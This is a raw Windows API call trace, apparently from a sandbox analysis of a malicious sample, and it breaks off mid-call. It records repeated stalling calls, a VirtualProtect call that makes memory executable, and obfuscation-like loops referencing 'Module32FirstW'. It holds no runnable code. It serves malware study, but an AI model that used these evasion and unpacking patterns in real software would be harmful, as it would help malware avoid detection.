[0117.902] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.902] GetACP () returned 0x4e4 [0117.902] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.902] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.902] GetACP () returned 0x4e4 [0117.902] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.902] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.902] GetACP () returned 0x4e4 [0117.902] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.902] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.902] GetACP () returned 0x4e4 [0117.902] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.902] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.902] GetACP () returned 0x4e4 [0117.902] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.902] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.903] GetACP () returned 0x4e4 [0117.903] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.903] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.903] GetACP () returned 0x4e4 [0117.903] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.903] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.903] GetACP () returned 0x4e4 [0117.903] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.903] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.903] GetACP () returned 0x4e4 [0117.903] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.903] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.903] GetACP () returned 0x4e4 [0117.903] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.903] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.903] GetACP () returned 0x4e4 [0117.903] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.903] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.903] GetACP () returned 0x4e4 [0117.904] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.904] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.904] GetACP () returned 0x4e4 [0117.904] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.904] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.904] GetACP () returned 0x4e4 [0117.904] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.904] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.904] GetACP () returned 0x4e4 [0117.904] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.904] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.904] GetACP () returned 0x4e4 [0117.904] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.904] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.904] GetACP () returned 0x4e4 [0117.904] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.904] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.904] GetACP () returned 0x4e4 [0118.213] VirtualProtect (in: lpAddress=0x255ab8, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0118.213] AddAtomA (lpString=0x0) returned 0x0 [0118.213] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.214] AddAtomA (lpString=0x0) returned 0x0 [0118.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.214] AddAtomA (lpString=0x0) returned 0x0 [0118.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.214] AddAtomA (lpString=0x0) returned 0x0 [0118.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.214] AddAtomA (lpString=0x0) returned 0x0 [0118.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.214] AddAtomA (lpString=0x0) returned 0x0 [0118.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.214] AddAtomA (lpString=0x0) returned 0x0 [0118.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.214] AddAtomA (lpString=0x0) returned 0x0 [0118.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.214] AddAtomA (lpString=0x0) returned 0x0 [0118.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.214] AddAtomA (lpString=0x0) returned 0x0 [0118.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.215] AddAtomA (lpString=0x0) returned 0x0 [0118.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.215] AddAtomA (lpString=0x0) returned 0x0 [0118.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.215] AddAtomA (lpString=0x0) returned 0x0 [0118.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.215] AddAtomA (lpString=0x0) returned 0x0 [0118.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.215] AddAtomA (lpString=0x0) returned 0x0 [0118.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.215] AddAtomA (lpString=0x0) returned 0x0 [0118.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.215] AddAtomA (lpString=0x0) returned 0x0 [0118.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.215] AddAtomA (lpString=0x0) returned 0x0 [0118.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.215] AddAtomA (lpString=0x0) returned 0x0 [0118.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.215] AddAtomA (lpString=0x0) returned 0x0 [0118.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.215] AddAtomA (lpString=0x0) returned 0x0 [0118.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.216] AddAtomA (lpString=0x0) returned 0x0 [0118.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.216] AddAtomA (lpString=0x0) returned 0x0 [0118.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.216] AddAtomA (lpString=0x0) returned 0x0 [0118.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.216] AddAtomA (lpString=0x0) returned 0x0 [0118.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.216] AddAtomA (lpString=0x0) returned 0x0 [0118.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.216] AddAtomA (lpString=0x0) returned 0x0 [0118.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.216] AddAtomA (lpString=0x0) returned 0x0 [0118.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.216] AddAtomA (lpString=0x0) returned 0x0 [0118.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.216] AddAtomA (lpString=0x0) returned 0x0 [0118.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.217] AddAtomA (lpString=0x0) returned 0x0 [0118.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.217] AddAtomA (lpString=0x0) returned 0x0 [0118.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.217] AddAtomA (lpString=0x0) returned 0x0 [0118.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.217] AddAtomA (lpString=0x0) returned 0x0 [0118.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.217] AddAtomA (lpString=0x0) returned 0x0 [0118.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.217] AddAtomA (lpString=0x0) returned 0x0 [0118.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.217] AddAtomA (lpString=0x0) returned 0x0 [0118.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.217] AddAtomA (lpString=0x0) returned 0x0 [0118.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.217] AddAtomA (lpString=0x0) returned 0x0 [0118.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.218] AddAtomA (lpString=0x0) returned 0x0 [0118.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.218] AddAtomA (lpString=0x0) returned 0x0 [0118.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.218] AddAtomA (lpString=0x0) returned 0x0 [0118.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.218] AddAtomA (lpString=0x0) returned 0x0 [0118.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.218] AddAtomA (lpString=0x0) returned 0x0 [0118.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.218] AddAtomA (lpString=0x0) returned 0x0 [0118.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.218] AddAtomA (lpString=0x0) returned 0x0 [0118.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.218] AddAtomA (lpString=0x0) returned 0x0 [0118.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.218] AddAtomA (lpString=0x0) returned 0x0 [0118.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.218] AddAtomA (lpString=0x0) returned 0x0 [0118.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.218] AddAtomA (lpString=0x0) returned 0x0 [0118.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.219] AddAtomA (lpString=0x0) returned 0x0 [0118.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.219] AddAtomA (lpString=0x0) returned 0x0 [0118.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.219] AddAtomA (lpString=0x0) returned 0x0 [0118.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.219] AddAtomA (lpString=0x0) returned 0x0 [0118.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.219] AddAtomA (lpString=0x0) returned 0x0 [0118.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.219] AddAtomA (lpString=0x0) returned 0x0 [0118.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.219] AddAtomA (lpString=0x0) returned 0x0 [0118.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.219] AddAtomA (lpString=0x0) returned 0x0 [0118.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.219] AddAtomA (lpString=0x0) returned 0x0 [0118.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.219] AddAtomA (lpString=0x0) returned 0x0 [0118.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.220] AddAtomA (lpString=0x0) returned 0x0 [0118.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.220] AddAtomA (lpString=0x0) returned 0x0 [0118.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.220] AddAtomA (lpString=0x0) returned 0x0 [0118.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.220] AddAtomA (lpString=0x0) returned 0x0 [0118.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.220] AddAtomA (lpString=0x0) returned 0x0 [0118.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.220] AddAtomA (lpString=0x0) returned 0x0 [0118.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.220] AddAtomA (lpString=0x0) returned 0x0 [0118.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.220] AddAtomA (lpString=0x0) returned 0x0 [0118.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.220] AddAtomA (lpString=0x0) returned 0x0 [0118.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.220] AddAtomA (lpString=0x0) returned 0x0 [0118.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.221] AddAtomA (lpString=0x0) returned 0x0 [0118.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.221] AddAtomA (lpString=0x0) returned 0x0 [0118.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.221] AddAtomA (lpString=0x0) returned 0x0 [0118.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.221] AddAtomA (lpString=0x0) returned 0x0 [0118.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.221] AddAtomA (lpString=0x0) returned 0x0 [0118.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.221] AddAtomA (lpString=0x0) returned 0x0 [0118.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.221] AddAtomA (lpString=0x0) returned 0x0 [0118.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.221] AddAtomA (lpString=0x0) returned 0x0 [0118.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.222] AddAtomA (lpString=0x0) returned 0x0 [0118.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.222] AddAtomA (lpString=0x0) returned 0x0 [0118.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.222] AddAtomA (lpString=0x0) returned 0x0 [0118.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.222] AddAtomA (lpString=0x0) returned 0x0 [0118.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.222] AddAtomA (lpString=0x0) returned 0x0 [0118.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.222] AddAtomA (lpString=0x0) returned 0x0 [0118.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.222] AddAtomA (lpString=0x0) returned 0x0 [0118.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.223] AddAtomA (lpString=0x0) returned 0x0 [0118.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.223] GetCurrentDirectoryA (in: nBufferLength=0x0, 